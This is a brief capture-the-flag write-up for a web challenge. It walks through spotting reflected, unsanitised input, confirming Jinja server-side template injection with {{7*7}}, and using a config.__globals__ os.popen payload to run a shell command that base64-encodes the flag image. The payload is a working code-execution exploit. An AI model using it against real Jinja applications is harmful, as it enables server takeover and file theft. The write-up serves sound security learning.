Rating: 5.0
What is open flag challenge ? I will tell the location of flag where its located, you just need to access that flag.
The given website consists of 2 pages: A registration panel and a static page.
We notice that upon entering a username it gets reflected on the static page. After trying to inject some payloads we notice that user input is not sanitized.
Therefore we can test the website for Server Side Template Injections. We discover that they use jinja templating engine. Using a simple payload like the one below we can confirm the vulnerability.
{{7*7}}
Using the crafted payload below we can exploit the SSTI and get code execution.
{{config.__class__.__init__.__globals__['os'].popen('base64 flag.jpg').read()}}
This will reflect the flag image in the static html page base64 encoded. Save response in a txt file and decode with:
base64 -d flag.txt > flag.jpg
Flag is presented in the image.
Happy hacking :)